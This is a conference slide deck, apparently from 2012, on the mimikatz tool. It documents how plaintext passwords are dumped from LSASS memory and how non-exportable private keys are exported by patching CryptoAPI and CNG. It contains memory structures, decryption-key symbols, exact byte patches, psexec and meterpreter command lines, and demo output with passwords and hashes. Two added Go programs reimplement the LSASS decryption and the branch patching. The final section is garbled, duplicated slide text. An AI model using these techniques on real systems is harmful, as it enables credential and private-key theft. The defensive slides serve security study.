tspkg!SpAcceptCredentials
  <- A Live user can logon through RDP via SSO

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  [...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
mimikatz::sekurlsa::livessp: workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> search the linked list livessp!LiveGlobalLogonSessionList for the LUID -> KIWI_LIVESSP_LIST_ENTRY -> suppCreds -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]
typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz::sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me: yes
mimikatz::sekurlsa::kerberos
Let's login with a normal account
After credentials protection, KerbCreateLogonSession calls
- NT6: KerbInsertOrLocateLogonSession to insert the data in KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession to insert the data in KerbLogonSessionList
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  <- Kerberos ticket part? Maybe ;)

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
  <- Kerberos part for the password

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz::sekurlsa::kerberos (nt6): workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz::sekurlsa::kerberos (nt5): workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> search the linked list kerberos!KerbLogonSessionList for the LUID -> KIWI_KERBEROS_LOGON_SESSION -> LsaUnprotectMemory -> password in clear]
typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    /* [...] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz::sekurlsa: demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz::sekurlsa::kerberos: "hu?"
Ok. It works...
But why?
Not on all logons on NT5 (it can need an unlock)
From my understanding of Microsoft's explanations:
- no need of passwords for the Kerberos protocol...
- all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logical...
- For password auth
  • password hash for the shared secret, but keeping the password in memory
- For full smartcard auth
  • No password on the client
  • No hash on the client
  - NTLM hash on the client...
  - the KDC sent it back as a gift
mimikatz::sekurlsa
All passwords in memory are encrypted, but in a reversible way, to be usable
We used LsaUnprotectMemory in the LSASS context to decrypt them
- This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) in the LSASS process to take benefit of its keys when we called it
Can it be fun to decrypt outside the process?
- Yes it is... no more injection, just reading the memory of the LSASS process...
mimikatz can use lsasrv.dll too and "imports" the keys initialized by LSASS
- When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we have the same behaviour as when we are in LSASS
mimikatz::sekurlsa: LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses:
- RC4
- DESx
[Diagram: in LSASS, lsasrv holds the NT5 key material: g_cbRandomKey (DWORD = 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]) and g_Feedback (BYTE[8]); mimikatz copies them from the LSASS memory into its own lsasrv instance...]
mimikatz::sekurlsa: LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses:
- 3DES
- AES
[Diagram: in LSASS, lsasrv holds the NT6 key material: InitializationVector (BYTE[16]), h3DesKey and hAesKey (BCrypt key handles laid out as below); mimikatz copies them from the LSASS memory...]
typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;
mimikatz :: sekurlsa :: memo

Security Packages

  Package          Symbols                                 Type
  tspkg            tspkg!TSGlobalCredTable                 RTL_AVL_TABLE
  wdigest          wdigest!l_LogSessList                   LIST_ENTRY
  livessp          livessp!LiveGlobalLogonSessionList      LIST_ENTRY
  kerberos (nt5)   kerberos!KerbLogonSessionList           LIST_ENTRY
  kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable    RTL_AVL_TABLE
  msv1_0           lsasrv!LogonSessionList                 LIST_ENTRY
                   lsasrv!LogonSessionListCount            ULONG

Protection Keys

  Key     NT5 symbols
  RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
  DESX    lsasrv!g_pDESXKey, lsasrv!g_Feedback

  Key     NT6 symbols
  (IV)    lsasrv!InitializationVector
  3DES    lsasrv!h3DesKey
  AES     lsasrv!hAesKey
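The NT6 size rule and the key symbols above, worked through as an added example (this is not mimikatz code and is not from the slides): a Go re-implementation of the LsaProtectMemory/LsaUnprotectMemory pair that picks 3DES or AES from the buffer length. The chaining modes (3DES in CBC with the first 8 IV bytes, AES in CFB with the full 16-byte IV) follow what the mimikatz source sets on its two BCrypt handles; the full-block CFB feedback width is an assumption of this example, and the key material is constructed here (on a real system it is read out of lsass at lsasrv!InitializationVector, lsasrv!h3DesKey and lsasrv!hAesKey).

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/des"
	"fmt"
)

// Nt6LsaKeys is the NT6 material the memo lists: lsasrv!InitializationVector
// and the raw key bytes behind lsasrv!h3DesKey / lsasrv!hAesKey
// (KIWI_BCRYPT_KEY -> cle -> KIWI_BCRYPT_KEY_DATA.data).
type Nt6LsaKeys struct {
	IV      []byte // 16 bytes
	DES3Key []byte // 24 bytes
	AESKey  []byte // 16 bytes here; aes.NewCipher also takes 24 or 32
}

// CipherFor is the size rule from the slide: a multiple of 8 bytes is
// handled by 3DES, any other length by AES.
func CipherFor(n int) string {
	if n%8 == 0 {
		return "3DES"
	}
	return "AES"
}

// lsaCrypt is shared by both directions. The chaining modes are the ones the
// mimikatz source sets on its two BCrypt handles (3DES in CBC, AES in CFB);
// using full-block (128-bit) CFB feedback is an assumption of this example.
func lsaCrypt(keys Nt6LsaKeys, in []byte, decrypt bool) ([]byte, error) {
	out := make([]byte, len(in))
	if CipherFor(len(in)) == "3DES" {
		block, err := des.NewTripleDESCipher(keys.DES3Key)
		if err != nil {
			return nil, err
		}
		iv := keys.IV[:des.BlockSize] // 3DES only consumes the first 8 IV bytes
		if decrypt {
			cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, in)
		} else {
			cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, in)
		}
		return out, nil
	}
	block, err := aes.NewCipher(keys.AESKey)
	if err != nil {
		return nil, err
	}
	iv := keys.IV[:aes.BlockSize] // AES uses the whole 16-byte IV
	if decrypt {
		cipher.NewCFBDecrypter(block, iv).XORKeyStream(out, in)
	} else {
		cipher.NewCFBEncrypter(block, iv).XORKeyStream(out, in)
	}
	return out, nil
}

// LsaProtectMemory is what lsasrv does to a credential before keeping it;
// LsaUnprotectMemory is what sekurlsa does with the copied keys.
func LsaProtectMemory(keys Nt6LsaKeys, clear []byte) ([]byte, error) {
	return lsaCrypt(keys, clear, false)
}

func LsaUnprotectMemory(keys Nt6LsaKeys, enc []byte) ([]byte, error) {
	return lsaCrypt(keys, enc, true)
}

// ConstructedKeys is sample key material for this example only. On a real
// system the values are whatever lsasrv generated at boot and have to be
// read out of lsass memory at the symbols named above.
func ConstructedKeys() Nt6LsaKeys {
	return Nt6LsaKeys{
		IV:      []byte("0123456789abcdef"),
		DES3Key: []byte("kiwi-3des-key-24-bytes!!"),
		AESKey:  []byte("kiwi-aes-key-16b"),
	}
}

// RoundTrip protects a secret, unprotects it again, and reports which cipher
// the length selected and whether the plaintext survived.
func RoundTrip(secret []byte) (string, bool, error) {
	keys := ConstructedKeys()
	enc, err := LsaProtectMemory(keys, secret)
	if err != nil {
		return "", false, err
	}
	dec, err := LsaUnprotectMemory(keys, enc)
	if err != nil {
		return "", false, err
	}
	return CipherFor(len(secret)), bytes.Equal(dec, secret), nil
}

func main() {
	// "waza1234" as UTF-16LE is 16 bytes and takes the 3DES path; a 15-byte
	// buffer (the same string with its last byte dropped) takes the AES path.
	wide := []byte("w\x00a\x00z\x00a\x001\x002\x003\x004\x00")
	for _, s := range [][]byte{wide, wide[:15]} {
		algo, ok, err := RoundTrip(s)
		fmt.Printf("%2d bytes -> %-4s round-trip ok=%v err=%v\n", len(s), algo, ok, err)
	}
}
```

The practical consequence of the size rule: a UNICODE_STRING password buffer of even length is a 3DES blob, so a dump parser has to decide per secret which handle's key to use, and both keys plus the IV are needed to get everything back.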
mimikatz :: sekurlsa :: memo

Some commands:
  mimikatz # privilege::debug
  mimikatz # sekurlsa::logonPasswords full
  mimikatz # exit

  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit

  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
  mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */
  // http://blog.gentilkiwi.com/mimikatz

  mimikatz # privilege::debug
  Request for SeDebugPrivilege ACTIVATION : OK

  mimikatz # sekurlsa::logonPasswords full
  Authentication Id      : 0;234870
  Authentication package : NTLM
  Primary user           : Gentil Kiwi
  Authentication domain  : vm-w8-rp-x
          msv1_0 :
                  User      : Gentil Kiwi
                  Domain    : vm-w8-rp-x
                  LM hash   : d0e9aee149655a6075e4540af1f22d3b
                  NTLM hash : cc36cf7a8514893efccd332446158b1a
          kerberos :
                  User      : Gentil Kiwi
                  Domain    : vm-w8-rp-x
                  Password  : waza1234
          wdigest :
                  User      : Gentil Kiwi
                  Domain    : vm-w8-rp-x
                  Password  : waza1234
          tspkg :
                  User      : Gentil Kiwi
                  Domain    : vm-w8-rp-x
                  Password  : waza1234
          livessp :
                  n.t. (LUID KO)
mimikatz :: sekurlsa :: what we can do

Basics
– No physical access to the computer (first step to pass-the-hash, then pass-the-pass)
– No admin rights, system rights, debug privileges (...)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass-the-hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks

More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic stuff:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign-on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Take the opportunities to stop backward compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto :: what is it

A little module that I wrote to
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • even those which are "not" exportable

What the crypto module can do
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format
    – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))
mimikatz :: crypto :: how it's protected

(module: mod_mimikatz_crypto)

Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • at least without the master keys and/or passwords of users

Computer/User can load their own keys because they have enough secrets to do it (e.g. session opened)
– Yes, a computer/server opens a "session"

Export/Usage can be limited by
– Password
– Popup
– Export/Archive flag not present
(slide notes next to the list: "Constraint for most users", "Unavailable for computer keys")

  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
– http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here...) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, ...
– cryptdll.dll, rsaenh.dll, ...

Processes deal with cryptographic keys through this API...
mimikatz :: crypto :: capi :: how it's exported ( level)
(flowchart, "PLAYSKOOL" level: Process -> "Ask to export Key" -> CryptoAPI and RSA CSP -> "Exportable?" -> yes: Load Private Key (DPAPI decode) -> Exported Key; no: NTE_BAD_KEY_STATE)
mimikatz :: crypto :: patchcapi :: because I own my process

When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.

This function does all the work to prepare the export and checks if the key is exportable.
  mimikatz # crypto::exportCertificates
  Location : 'CERT_SYSTEM_STORE_CURRENT_USER\My'
   - Benjamin Delpy
          Key container  : 470ADFBA-8718-4014-B05E-B30776B75A03
          Provider       : Microsoft Enhanced Cryptographic Provider v1.0
          Type           : AT_KEYEXCHANGE
          Exportable     : NO
          Key size       : 2048
          Private export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Key not valid for use in specified state.
          Public export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

  ================ Certificate 0 ================
  Serial Number: 112169417a1c3ef46a301f99385f50680fa0
  Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
  Subject: CN=Benjamin Delpy, C=FR
  Non-root Certificate
  Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
    Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider = Microsoft Enhanced Cryptographic Provider v1.0
  Private key is NOT exportable
  Encryption test passed
  CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
  CertUtil: Key not valid for use in specified state.

(the slide highlights the "Exportable : NO" state in both outputs)
mimikatz :: crypto :: patchcapi :: because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!

I wrote "4" bytes in my memory space...
Before:
  .text:0AC0B7CB   0F 85 33 C7 FF FF     jnz  continue_key_export_or_archive
After:
  .text:0AC0B7CB   90                    nop
  .text:0AC0B7CC   E9 33 C7 FF FF        jmp  continue_key_export_or_archive

Before:
  .text:0AC1F749   0F 85 B6 3B FF FF     jnz  continue_key_export_or_archive_prepare
After:
  .text:0AC1F749   90                    nop
  .text:0AC1F74A   E9 B6 3B FF FF        jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi :: demo time

Import, export, import as not exportable... export!
mimikatz :: crypto :: patchcapi :: limitations

Because
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve, a little...

mimikatz crypto::patchcapi only deals with
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context.

Processes use RPC to call "Key isolation service" (keyiso) functions.

It seems more secure than CryptoAPI...
– It is, but it's not perfect...
mimikatz :: crypto :: cng :: how it's exported ( level)

(flowchart, "PLAYSKOOL" level: Process -> "Ask to export Key" -> CNG -> RPC -> KeyIso Service in the LSASS process (on NT6 a System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP) -> "Exportable?" -> yes: Load Private Key (DPAPI decode) -> Exported Key; no: NTE_NOT_SUPPORTED)
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), the RPC calls lead to ncrypt!SPCryptExportKey inside lsass (keyiso).

This function does all the work to prepare the export and checks if the key is exportable.
  mimikatz # crypto::exportKeys
  [user] CNG keys:
   - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
          Exportable : NO
          Key size   : 2048
          Private export to 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
          mod_cryptong::getPrivateKey ; PrivateKeyBlobToPVK (0x80090029) The requested operation is not supported.

(the slide highlights the "Exportable : NO" state)
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

This time, checks and keys are in the LSASS process... And what?

I wrote "1" byte in LSASS memory space...
Before:
  .text:6C815210   75 1C     jnz  short continue_key_export
After:
  .text:6C815210   EB 1C     jmp  short continue_key_export
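The patchcapi rewrites (two 6-byte near jnz sites in rsaenh) and the patchcng rewrite above (one 2-byte short jnz in ncrypt inside lsass) are the same trick: turn the conditional branch on the "exportable" check into an unconditional one without touching its displacement. The added Go example below is not mimikatz code; it takes the bytes shown on the slides as input, encodes the rule for both x86 encodings, and checks that the branch target does not move, which is exactly why the nop goes in front of the jmp rather than after it. Writing the result into the target process (own process for CAPI, lsass via WriteProcessMemory for CNG) is left out.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// target resolves a relative branch: the displacement is counted from the
// end of the instruction, so the instruction length is part of the sum.
func target(insnAddr uint64, insnLen int, disp int64) uint64 {
	return uint64(int64(insnAddr) + int64(insnLen) + disp)
}

// PatchJnzToJmp rewrites a jnz into an unconditional jmp and returns the new
// bytes. Two x86 encodings are handled:
//   near  jnz rel32: 0F 85 disp32 (6 bytes) -> 90 E9 disp32 (nop, then jmp rel32)
//   short jnz rel8 : 75 disp8     (2 bytes) -> EB disp8     (jmp rel8)
// The nop is placed *before* the 5-byte jmp so that the jmp ends where the
// 6-byte jnz ended; that is what lets the disp32 bytes stay untouched.
func PatchJnzToJmp(code []byte) ([]byte, error) {
	switch {
	case len(code) >= 6 && code[0] == 0x0F && code[1] == 0x85:
		out := append([]byte(nil), code[:6]...)
		out[0], out[1] = 0x90, 0xE9
		return out, nil
	case len(code) >= 2 && code[0] == 0x75:
		out := append([]byte(nil), code[:2]...)
		out[0] = 0xEB
		return out, nil
	}
	return nil, errors.New("no jnz at offset 0")
}

// BranchTarget decodes the destination of a jnz, of its patched form, or of
// a plain jmp located at addr, so before/after targets can be compared.
func BranchTarget(addr uint64, code []byte) (uint64, error) {
	switch {
	case len(code) >= 6 && code[0] == 0x0F && code[1] == 0x85: // jnz rel32
		return target(addr, 6, int64(int32(binary.LittleEndian.Uint32(code[2:6])))), nil
	case len(code) >= 6 && code[0] == 0x90 && code[1] == 0xE9: // nop; jmp rel32 at addr+1
		return target(addr+1, 5, int64(int32(binary.LittleEndian.Uint32(code[2:6])))), nil
	case len(code) >= 5 && code[0] == 0xE9: // jmp rel32
		return target(addr, 5, int64(int32(binary.LittleEndian.Uint32(code[1:5])))), nil
	case len(code) >= 2 && (code[0] == 0x75 || code[0] == 0xEB): // jnz/jmp rel8
		return target(addr, 2, int64(int8(code[1]))), nil
	}
	return 0, errors.New("unsupported opcode")
}

// Site is one patch location: the address and the original bytes.
type Site struct {
	Name string
	Addr uint64
	Code []byte
}

// SlideSites are the three locations shown on the slides (addresses are the
// ones printed there; they are only meaningful for that build and load address).
var SlideSites = []Site{
	{"patchcapi site 1", 0x0AC0B7CB, []byte{0x0F, 0x85, 0x33, 0xC7, 0xFF, 0xFF}},
	{"patchcapi site 2", 0x0AC1F749, []byte{0x0F, 0x85, 0xB6, 0x3B, 0xFF, 0xFF}},
	{"patchcng site", 0x6C815210, []byte{0x75, 0x1C}},
}

// PatchSite applies the rewrite and reports whether the branch target stayed put.
func PatchSite(s Site) ([]byte, bool, error) {
	patched, err := PatchJnzToJmp(s.Code)
	if err != nil {
		return nil, false, err
	}
	before, err := BranchTarget(s.Addr, s.Code)
	if err != nil {
		return nil, false, err
	}
	after, err := BranchTarget(s.Addr, patched)
	if err != nil {
		return nil, false, err
	}
	return patched, before == after, nil
}

func main() {
	for _, s := range SlideSites {
		patched, same, err := PatchSite(s)
		if err != nil {
			fmt.Println(s.Name, "error:", err)
			continue
		}
		tgt, _ := BranchTarget(s.Addr, s.Code)
		fmt.Printf("%-17s %08X: % X -> % X  target %08X unchanged=%v\n", s.Name, s.Addr, s.Code, patched, tgt, same)
	}
}
```

Before writing such a patch into a live process, a tool should compare the bytes it finds at the address with the expected original (the "Before" column on the slides); a different build of rsaenh.dll or ncrypt.dll puts the check elsewhere, and a blind write of 90 E9 into the wrong place corrupts the function.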
mimikatz :: crypto :: patchcng :: demo time

Import, export, import as not exportable... export again!
mimikatz :: crypto :: patchcng :: limitations

The patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM

mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)

Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?)
– certutil can...
mimikatz :: crypto :: patchcng :: bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart

Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil
  C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
  ================ Certificate 1 ================
  [...]
  Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
    Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Provider = Microsoft Software Key Storage Provider
  Private key is NOT exportable
  Encryption test passed
  CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
  CertUtil: Key not valid for use in specified state.

(same command once LSASS has been patched with crypto::patchcng)

  C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
  ================ Certificate 1 ================
  [...]
  Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
    Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Provider = Microsoft Software Key Storage Provider
  Encryption test passed
  CertUtil: -exportPFX command completed successfully.
mimikatz :: crypto :: memo

Some commands:
  mimikatz # crypto::patchcapi
  mimikatz # crypto::exportCertificates
  mimikatz # exit

  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit

  mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"

  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
– PFX files are protected by this password: mimikatz

Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do

Exactly the same as for sekurlsa; it will prevent access to accounts/computer
– no admin, no admin, no admin...

Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM

More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendor implementations (Lenovo, Dell, ...) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do

– Play with minesweeper
– Manipulate some handles
– Pass the hash
– Dump SAM / AD
– Stop event monitoring
– Patch Terminal Server
– Basic GPO bypass
– Applocker / SRP bypass
– Driver
  • Play with tokens & privileges
  • Display SSDT x86 & x64
  • List minifilters actions
  • List Notifications (process, thread, image, registry)
  • List Objects hooks and procedures
  • ...
– ...
mimikatz :: that's all folks

Thanks to
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, ...
– You, for your attention

Questions?
Don't be shy ;)
...especially if you have written down the corresponding slide number
Blog, Source Code & Contact

  blog     : http://blog.gentilkiwi.com
  mimikatz : http://blog.gentilkiwi.com/mimikatz
  source   : https://code.google.com/p/mimikatz
  email    : benjamin@gentilkiwi.com
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz working
mimikatz working
On XP 2003 Vista 2008 Seven 2008r2 8 Server 8
ndash x86 amp x64 ndash 2000 support dropped with mimikatz 10
Everywhere itrsquos statically compiled
Two modes
ndash direct action (local commands) ndash process or driver communication
On XP 2003 Vista 2008 Seven 2008r2 8 Server 8
ndash x86 amp x64 ndash 2000 support dropped with mimikatz 10
Everywhere itrsquos statically compiled
Two modes
ndash direct action (local commands) ndash process or driver communication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 3 3
sekurlsadll
mimikatzexe
mimikatzexe
KeyIso laquo Isolation de cleacute CNG raquo
LSASSEXE
Direct action cryptopatchcng
EventLog laquo Journal drsquoeacuteveacutenements Windows raquo
SVCHOSTEXE
Direct action diverseventdrop
mimikatzexe
mimikatzexe
SamSS laquo Gestionnaire de comptes de seacutecuriteacute raquo
LSASSEXE
VirtualAllocEx WriteProcessMemory CreateRemoteThread
Open a pipe Write a welcome message Wait commandshellip and return results
mimikatz architecture of sekurlsa amp crypto
mimikatz architecture of sekurlsa amp crypto
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 4 4
mimikatzexe
mimikatzexe
mod_mimikatz_sekurlsa
mod_mimikatz_nogpo mod_mimikatz_nogpo
mod_mimikatz_divers mod_mimikatz_divers
mod_mimikatz_winmine mod_mimikatz_winmine
mod_mimikatz_impersonate mod_mimikatz_impersonate
mod_mimikatz_inject mod_mimikatz_inject
mod_mimikatz_samdump mod_mimikatz_samdump
mod_mimikatz_standard mod_mimikatz_standard
mod_mimikatz_crypto
mod_mimikatz_handle mod_mimikatz_handle
mod_mimikatz_system mod_mimikatz_system
mod_mimikatz_service mod_mimikatz_service
mod_mimikatz_process mod_mimikatz_process
mod_mimikatz_thread mod_mimikatz_thread
mod_mimikatz_terminalserver mod_mimikatz_terminalserver
